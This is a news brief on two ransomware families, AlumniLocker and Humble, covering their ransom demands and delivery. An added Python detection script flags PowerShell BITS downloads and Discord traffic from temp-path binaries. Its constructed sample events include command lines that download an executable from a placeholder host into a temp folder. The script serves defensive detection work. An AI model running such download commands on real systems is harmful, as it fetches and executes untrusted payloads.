Researchers have discovered two new ransomware variants, named AlumniLocker and Humble. The two differ markedly in sophistication and in extortion technique, and can be considered the two extremes of the extortion business.
- AlumniLocker operators threaten to leak stolen data if the victim does not pay the ransom within 48 hours. In the case of Humble, the operators threaten to rewrite the Master Boot Record (MBR) after a restart, which leaves the target machine unusable.
- Moreover, another variant of Humble has been observed that makes the same threat of rewriting the MBR if the victim does not pay the ransom within five days.
- AlumniLocker asks for a ransom payment of 10 Bitcoins (presently valued at $457,382.60), while Humble demands 0.0002 Bitcoins (around $10).
How do they operate?
- AlumniLocker spreads via a malicious PDF attachment posing as an invoice, distributed in phishing emails. It is not known exactly how Humble infiltrates; phishing is a possible vector.
- Phishing emails carrying AlumniLocker have an attached Zip file that uses a PowerShell script to download and execute the payload. The script abuses the Background Intelligent Transfer Service (BITS) module for the download.
- The Humble ransomware is unusual in that it is a batch file compiled into an executable with a wrapper (Bat2Exe). In addition, it uses Discord (a communications service) to send reports back to its authors.
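The two delivery and reporting traits described above (a PowerShell script that downloads the payload through BITS, and a binary in a temp directory reporting to Discord) are exactly what endpoint telemetry can surface. The following is an added detection example written for this page, not code from the researchers or either malware family; the record layout mimics Sysmon process-creation (EventID 1) and network (EventID 3) events, and every sample event is constructed, with no real infrastructure referenced.

```python
"""Heuristics for the tradecraft described in the text: BITS-based download
launched from or inside PowerShell, and Discord contact from a temp-path binary.
Field names are an assumption modelled on Sysmon; adapt them to your log schema."""
import re

# Constructed sample events (not real telemetry); 'example.invalid' is a placeholder host.
SAMPLE_EVENTS = [
    {"id": 1, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "Start-BitsTransfer -Source http://example.invalid/x -Destination $env:TEMP\inv.exe"'},
    {"id": 2, "EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://example.invalid/p.exe C:\Users\u\AppData\Local\Temp\p.exe"},
    {"id": 3, "EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": r"bitsadmin /list"},
    {"id": 4, "EventID": 3, "Image": r"C:\Users\u\AppData\Local\Temp\invoice.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"id": 5, "EventID": 3, "Image": r"C:\Program Files\Discord\Discord.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
]

BITS_CMD = re.compile(r"(start-bitstransfer|bitsadmin\S*\s+/transfer)", re.I)  # cmdlet or CLI form
HTTP_SRC = re.compile(r"https?://", re.I)            # BITS pulling from a remote URL
TEMP_DIR = re.compile(r"\\(temp|tmp|downloads)\\", re.I)  # user-writable staging paths
DISCORD = re.compile(r"(^|\.)discord(app)?\.com$", re.I)

def is_powershell(path):
    return path.lower().endswith("powershell.exe")

def flag_bits_download(ev):
    """BITS used as a downloader, where PowerShell is the process or its parent."""
    if ev.get("EventID") != 1:
        return False
    cmd = ev.get("CommandLine", "")
    via_ps = is_powershell(ev["Image"]) or is_powershell(ev["ParentImage"])
    return via_ps and bool(BITS_CMD.search(cmd)) and bool(HTTP_SRC.search(cmd))

def flag_discord_beacon(ev):
    """Outbound Discord traffic from a binary running out of a temp-style path."""
    if ev.get("EventID") != 3:
        return False
    return bool(DISCORD.search(ev.get("DestinationHostname", ""))) and bool(TEMP_DIR.search(ev["Image"]))

def triage(events):
    """Return (event id, reason) pairs for every event matching a heuristic."""
    hits = []
    for ev in events:
        if flag_bits_download(ev):
            hits.append((ev["id"], "bits-download-via-powershell"))
        if flag_discord_beacon(ev):
            hits.append((ev["id"], "discord-beacon-from-temp"))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The legitimate `bitsadmin /list` call and the real Discord client are deliberately included so the heuristics can be checked for false positives, not only for hits.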
Cybercriminals keep developing new techniques to evade popular anti-malware software. Their continued investment in such threats is a warning to the cybersecurity community and demands a better defense and response strategy.